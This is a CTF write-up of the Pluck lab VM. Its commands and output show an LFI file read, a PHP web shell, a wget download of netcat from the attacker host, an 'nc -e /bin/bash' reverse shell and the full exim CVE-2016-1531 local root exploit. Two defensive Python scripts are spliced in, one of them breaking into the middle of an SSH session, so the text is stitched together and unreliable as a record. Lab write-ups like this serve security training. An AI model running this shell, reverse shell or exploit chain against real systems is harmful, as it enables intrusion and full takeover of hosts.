Mr_H4sh

Infosec, CTF and more

Pluck Solution

In this post I’m going to show you how to solve the Pluck VM provided by Ryan Oberto.

You can find the VM on this link

192.168.58.1 <== attacker
192.168.58.101 <== victim

I run an nmap scan, and this is what I find:

# Nmap 7.01 scan initiated Mon Mar 13 11:31:21 2017 as: nmap -sT -sV -p- -Pn -n -v -oA nmap_tcp_version_full_192.168.58.101 -T5 192.168.58.101
Nmap scan report for 192.168.58.101
Host is up (0.011s latency).
Not shown: 65531 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.3p1 Ubuntu 1 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
3306/tcp open  mysql   MySQL (unauthorized)
5355/tcp open  unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Mar 13 11:33:22 2017 -- 1 IP address (1 host up) scanned in 121.10 seconds

So, port 80 is open. I open it in a browser and find a web application. The web application has various links, and each link points to a PHP page (e.g. About points to about.php). The web application is vulnerable to LFI but not RFI. I check the /etc/passwd file by visiting http://192.168.58.101/index.php?page=/etc/passwd, and this is what I find:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:109::/var/run/dbus:/bin/false
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
lxd:x:108:65534::/var/lib/lxd/:/bin/false
uuidd:x:109:114::/run/uuidd:/bin/false
dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin
pollinate:x:112:1::/var/cache/pollinate:/bin/false
bob:x:1000:1000:bob,,,:/home/bob:/bin/bash
Debian-exim:x:113:119::/var/spool/exim4:/bin/false
peter:x:1001:1001:,,,:/home/peter:/bin/bash
paul:x:1002:1002:,,,:/home/paul:/usr/bin/pdmenu
backup-user:x:1003:1003:Just to make backups easier,,,:/backups:/usr/local/scripts/backup.sh

I see that the last user has a script instead of a shell. I visit the URL http://192.168.58.101/index.php?page=/usr/local/scripts/backup.sh and this is what I find:

#!/bin/bash

########################
# Server Backup script #
########################

#Backup directories in /backups so we can get it via tftp

echo "Backing up data"
tar -cf /backups/backup.tar /home /var/www/html > /dev/null 2>&1
echo "Backup complete"

The home folder of the user backup-user is /backups, and this script is making a backup of the web application in /backups/backup.tar. I download the file /backups/backup.tar using the following command:

# wget http://192.168.58.101/index.php?page=/backups/backup.tar
--2017-03-13 11:45:18--  http://192.168.58.101/index.php?page=/backups/backup.tar
Connecting to 192.168.58.101:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: ‘index.php?page=%2Fbackups%2Fbackup.tar’

index.php?page=%2Fb     [         <=>        ]   6.23G  64.2MB/s    in 93s     

2017-03-13 11:46:51 (68.2 MB/s) - Read error at byte 6685945954 (Success).Retrying.

The download keeps breaking and retrying, so after a while I stop it. I see that the file has been downloaded anyway, so I rename it to a tar archive and extract it. The archive does not extract completely, but it's enough to go ahead:

# mv index.php\?page\=%2Fbackups%2Fbackup.tar backup.tar
# tar -xvf backup.tar 
tar: This does not look like a tar archive
tar: Skipping to next header
ome/bob/.sudo_as_admin_successful
tar: Skipping to next header
home/
home/bob/
home/bob/.bashrc
home/bob/.sudo_as_admin_successful
home/bob/.profile
home/bob/.bash_logout
home/paul/
home/paul/keys/
home/paul/keys/id_key3.pub
home/paul/keys/id_key2.pub
home/paul/keys/id_key2
home/paul/keys/id_key4.pub
home/paul/keys/id_key5.pub
home/paul/keys/id_key6
home/paul/keys/id_key1
home/paul/keys/id_key5
home/paul/keys/id_key1.pub
home/paul/keys/id_key6.pub
home/paul/keys/id_key4
home/paul/keys/id_key3
home/paul/.bashrc
home/paul/.profile
home/paul/.bash_logout
home/peter/
home/peter/.bashrc
home/peter/.profile
home/peter/.bash_logout
var/www/html/
var/www/html/fonts/
var/www/html/fonts/glyphicons-halflings-regular.svg
var/www/html/fonts/glyphicons-halflings-regular.woff2
var/www/html/fonts/glyphicons-halflings-regular.ttf
var/www/html/fonts/glyphicons-halflings-regular.woff
var/www/html/fonts/glyphicons-halflings-regular.eot
var/www/html/about.php
var/www/html/index.php
tar: Skipping to next header
ome/bob/.sudo_as_admin_successful
tar: Skipping to next header

I get into /home/paul/keys and I find a bunch of SSH keys. I try to SSH to the victim machine using paul as the user and each of the keys, and I find out that id_key4.pub asks for a passphrase, but id_key4 doesn't:

# /home/paul/keys# ls -l
total 29
-rwxrwxrwx 1 anthony anthony  668 Jan 18 18:08 id_key1
-rwxrwxrwx 1 anthony anthony  600 Jan 18 18:08 id_key1.pub
-rwxrwxrwx 1 anthony anthony  672 Jan 18 18:08 id_key2
-rwxrwxrwx 1 anthony anthony  600 Jan 18 18:08 id_key2.pub
-rwxrwxrwx 1 anthony anthony  668 Jan 18 18:08 id_key3
-rwxrwxrwx 1 anthony anthony  600 Jan 18 18:08 id_key3.pub
-rwxrwxrwx 1 anthony anthony 1679 Jan 18 18:09 id_key4
-rwxrwxrwx 1 anthony anthony  392 Jan 18 18:09 id_key4.pub
-rwxrwxrwx 1 anthony anthony  668 Jan 18 18:08 id_key5
-rwxrwxrwx 1 anthony anthony  600 Jan 18 18:08 id_key5.pub
-rwxrwxrwx 1 anthony anthony 1675 Jan 18 18:09 id_key6
-rwxrwxrwx 1 anthony anthony  392 Jan 18 18:09 id_key6.pub

# chmod 700 /home/paul/keys/
# chmod 600 /home/paul/keys/*
# ssh -i id_key1 paul@192.168.58.101
The authenticity of host '192.168.58.101 (192.168.58.101)' can't be established.
ECDSA key fingerprint is SHA256:bNvu4Av4Bhl0MM7y9oSir/U4GlOayJaxliMmqVkMqTc.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.58.101' (ECDSA) to the list of known hosts.
paul@192.168.58.101's password: 

/keys# ssh -i id_key2 paul@192.168.58.101
paul@192.168.58.101's password: 

/keys# ssh -i id_key2.pub paul@192.168.58.101
paul@192.168.58.101's password: 

/keys# ssh -i id_key3.pub paul@192.168.58.101
paul@192.168.58.101's password: 

/keys# ssh -i id_key4.pub paul@192.168.58.101
Enter passphrase for key 'id_key4.pub': 
Enter passphrase for key 'id_key4.pub': 
Enter passphrase for key 'id_key4.pub': 
paul@192.168.58.101's password: 

/keys# ssh -i id_key4 paul@192.168.58.101
Welcome to Pdmenu 1.3.4 by Joey Hess <joey@kitenet.net>

The system has the following functionalities:

- Directory listing
- Change directory
- Edit file
- Who's online?
- WWW
- Telnet
- Ping
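The observation above, that one of the recovered keys loads without a passphrase, can be checked without attempting a login. As an added example, not code from the write-up, the following Python audits private-key files for a missing passphrase in both the legacy PEM format and the openssh-key-v1 format; the sample keys are constructed header-only stand-ins, not material from the VM.

```python
import base64
import struct

OPENSSH_MAGIC = b"openssh-key-v1\x00"

def openssh_cipher(b64_body):
    """Cipher name recorded in an openssh-key-v1 blob; 'none' means no passphrase."""
    blob = base64.b64decode(b64_body)
    if not blob.startswith(OPENSSH_MAGIC):
        raise ValueError("not an openssh-key-v1 blob")
    off = len(OPENSSH_MAGIC)
    (n,) = struct.unpack(">I", blob[off:off + 4])   # first field: string ciphername
    return blob[off + 4:off + 4 + n].decode("ascii")

def key_is_encrypted(text):
    """True if the private key needs a passphrase (legacy PEM or OpenSSH format)."""
    lines = [l.strip() for l in text.strip().splitlines()]
    if lines[0] == "-----BEGIN OPENSSH PRIVATE KEY-----":
        return openssh_cipher("".join(lines[1:-1])) != "none"
    # Legacy PEM (RSA/DSA/EC): encryption is announced by a Proc-Type header
    return any(l.startswith("Proc-Type: 4,ENCRYPTED") for l in lines[1:4])

def unprotected_keys(keys):
    """keys: {filename: contents}; return the private keys stored without a passphrase."""
    return sorted(name for name, text in keys.items() if not key_is_encrypted(text))

def fake_openssh_key(cipher):
    # Constructed header-only blob (magic, ciphername, kdfname); enough for the check
    kdf = b"none" if cipher == "none" else b"bcrypt"
    blob = OPENSSH_MAGIC + struct.pack(">I", len(cipher)) + cipher.encode()
    blob += struct.pack(">I", len(kdf)) + kdf
    b64 = base64.b64encode(blob).decode()
    return f"-----BEGIN OPENSSH PRIVATE KEY-----\n{b64}\n-----END OPENSSH PRIVATE KEY-----\n"

# Constructed samples with dummy bodies; none of this is key material from the VM.
SAMPLE_KEYS = {
    "rsa_plain": "-----BEGIN RSA PRIVATE KEY-----\nMIIEpAIBAAKCAQEA\n-----END RSA PRIVATE KEY-----\n",
    "rsa_protected": ("-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\n"
                      "DEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF\n\n"
                      "MIIEpAIBAAKCAQEA\n-----END RSA PRIVATE KEY-----\n"),
    "openssh_plain": fake_openssh_key("none"),
    "openssh_protected": fake_openssh_key("aes256-ctr"),
}
```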

I change the directory to /var/www/html to add a PHP backdoor, but the folder does not have write permissions. So I change the directory to /tmp and I add a PHP shell script there, to run through the web browser since the application is vulnerable to LFI:

# /tmp/shell.php
<?php

if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
}

?>

Then I visit the URL http://192.168.58.101/index.php?cmd=id&page=/tmp/shell.php and I get command execution. I visit http://192.168.58.101/index.php?cmd=wget%20-O%20/tmp/nc%20http://192.168.58.1:8081/nc&page=/tmp/shell.php to download a netcat build that supports the -e option into the /tmp folder on the machine, then http://192.168.58.101/index.php?cmd=chmod%20777%20/tmp/nc&page=/tmp/shell.php to add execution permissions, and finally http://192.168.58.101/index.php?cmd=/tmp/nc%20192.168.58.1%204444%20-e%20/bin/bash&page=/tmp/shell.php to get a reverse shell. This is what I get:

# nc -lnvp 4444
Listening on [0.0.0.0] (family 0, port 4444)
Connection from [192.168.58.101] port 4444 [tcp/*] accepted (family 2, sport 51056)
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
pwd
/var/www/html
uname -a
Linux pluck 4.8.0-22-generic #24-Ubuntu SMP Sat Oct 8 09:15:00 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
cat /etc/*-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.10
DISTRIB_CODENAME=yakkety
DISTRIB_DESCRIPTION="Ubuntu 16.10"
NAME="Ubuntu"
VERSION="16.10 (Yakkety Yak)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.10"
VERSION_ID="16.10"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="http://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=yakkety
UBUNTU_CODENAME=yakkety

The shell is a bit unstable, but better than nothing.
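The requests above (the /etc/passwd read, the backup.sh and backup.tar fetches, and the cmd= calls through /tmp/shell.php) all leave a distinctive trace in the web server's access log. As an added example that is not part of the original write-up, this Python script parses constructed Apache-format lines modelled on those requests and flags include-parameter abuse; the allowlist of legitimate pages and the log lines are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Apache combined-format lines, constructed to mirror the requests made in the
# write-up (not the VM's real log). The last line is ordinary navigation.
SAMPLE_LOG = """\
192.168.58.1 - - [13/Mar/2017:11:40:02 +0000] "GET /index.php?page=/etc/passwd HTTP/1.1" 200 2104 "-" "Mozilla/5.0"
192.168.58.1 - - [13/Mar/2017:11:42:11 +0000] "GET /index.php?page=/usr/local/scripts/backup.sh HTTP/1.1" 200 311 "-" "Mozilla/5.0"
192.168.58.1 - - [13/Mar/2017:11:45:18 +0000] "GET /index.php?page=%2Fbackups%2Fbackup.tar HTTP/1.1" 200 6685945954 "-" "Wget/1.18"
192.168.58.1 - - [13/Mar/2017:12:01:45 +0000] "GET /index.php?cmd=id&page=/tmp/shell.php HTTP/1.1" 200 88 "-" "Mozilla/5.0"
192.168.58.1 - - [13/Mar/2017:12:03:09 +0000] "GET /index.php?page=about.php HTTP/1.1" 200 4412 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*" '
                    r'(?P<status>\d{3}) (?P<size>\d+|-)')

# The application's menu links each map to a local .php file, so the include
# parameter only ever needs to name one of these (assumed allowlist).
ALLOWED_PAGES = {"index.php", "about.php"}
SHELL_PARAMS = {"cmd", "exec", "command"}

def classify_request(target):
    """Return the reasons a request to index.php looks like include abuse ([] if clean)."""
    parts = urlsplit(target)
    if parts.path.rsplit("/", 1)[-1] != "index.php":
        return []
    qs = parse_qs(parts.query, keep_blank_values=True)  # decodes one layer of %XX
    reasons = []
    for raw in qs.get("page", []):
        page = unquote(raw)  # second pass catches double-encoded payloads
        if page.startswith("/") or ".." in page or "\x00" in page:
            reasons.append(f"absolute path, traversal or null byte in page={page!r}")
        elif "://" in page or page.startswith("data:"):
            reasons.append(f"stream wrapper in page={page!r}")
        elif page not in ALLOWED_PAGES:
            reasons.append(f"page outside allowlist: {page!r}")
    shell_hits = SHELL_PARAMS & set(qs)
    if shell_hits:
        reasons.append(f"command parameter(s) sent to the include page: {sorted(shell_hits)}")
    return reasons

def scan_log(text):
    """Parse access-log lines; return (ip, status, size, reasons) for every flagged request."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and (reasons := classify_request(m["target"])):
            findings.append((m["ip"], int(m["status"]), m["size"], reasons))
    return findings
```

The oversized 200 response for the backup.tar include is itself worth alerting on: an include page should never return gigabytes.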

I do some research and look for files with the SUID bit set, and this is what I find:

# find / -perm -4000 2>/dev/null
/usr/exim/bin/exim-4.84-7
/usr/bin/passwd
/usr/bin/at
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/traceroute6.iputils
/usr/bin/newuidmap
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/newgidmap
/usr/bin/chsh
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/s-nail/s-nail-privsep
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/bin/su
/bin/umount
/bin/mount
/bin/fusermount
/bin/ping
/bin/ntfs-3g

I search online for exploits for exim-4.84-7, and I find the following URL: https://www.exploit-db.com/exploits/39535/

I put the body of the exploit in a file, download it onto the machine, change the permissions and execute it. The exploit elevates me to root:

# cat exploit.sh
#!/bin/sh
# CVE-2016-1531 exim <= 4.84-3 local root exploit
# ===============================================
# you can write files as root or force a perl module to
# load by manipulating the perl environment and running
# exim with the "perl_startup" argument -ps. 
#
# e.g.
# [fantastic@localhost tmp]$ ./cve-2016-1531.sh 
# [ CVE-2016-1531 local root exploit
# sh-4.3# id
# uid=0(root) gid=1000(fantastic) groups=1000(fantastic)
# 
# -- Hacker Fantastic 
echo [ CVE-2016-1531 local root exploit
cat > /tmp/root.pm << EOF
package root;
use strict;
use warnings;
 
system("/bin/sh");
EOF
PERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim -ps

# chmod +x exploit.sh
chmod +x exploit.sh

# ./exploit.sh
./exploit.sh
[ CVE-2016-1531 local root exploit
id
uid=0(root) gid=33(www-data) groups=33(www-data)
cd /root  
ls -la
total 48
drwx------  2 root root  4096 Jan 25 13:28 .
drwxr-xr-x 23 root root  4096 Jan 18 11:14 ..
-rw-------  1 root root     1 Jan 20 08:58 .bash_history
-rw-r--r--  1 root root  3106 Oct 22  2015 .bashrc
-rw-------  1 root root    84 Jan 20 09:00 .lesshst
-rw-------  1 root root    81 Jan 18 12:00 .mysql_history
-rw-r--r--  1 root root   148 Aug 17  2015 .profile
-rw-------  1 root root 10539 Jan 25 13:28 .viminfo
-rw-r--r--  1 root root   209 Jan 18 19:40 .wget-hsts
-rw-r--r--  1 root root   599 Jan 19 06:07 flag.txt
cat flag.txt

Congratulations you found the flag

---------------------------------------

######   ((((((((((((((((((((((((((((((
#########   (((((((((((((((((((((((((((
,,##########   ((((((((((((((((((((((((
@@,,,##########   (((((((((((((((((((((
@@@@@,,,##########                     
@@@@@@@@,,,############################
@@@@@@@@@@@,,,#########################
@@@@@@@@@,,,###########################
@@@@@@,,,##########                    
@@@,,,##########   &&&&&&&&&&&&&&&&&&&&
,,,##########   &&&&&&&&&&&&&&&&&&&&&&&
##########   &&&&&&&&&&&&&&&&&&&&&&&&&&
#######   &&&&&&&&&&&&&&&&&&&&&&&&&&&&&

Thank you to Ryan Oberto for the VM and Vulnhub for hosting it. For any information or comment, please do not hesitate to leave a comment.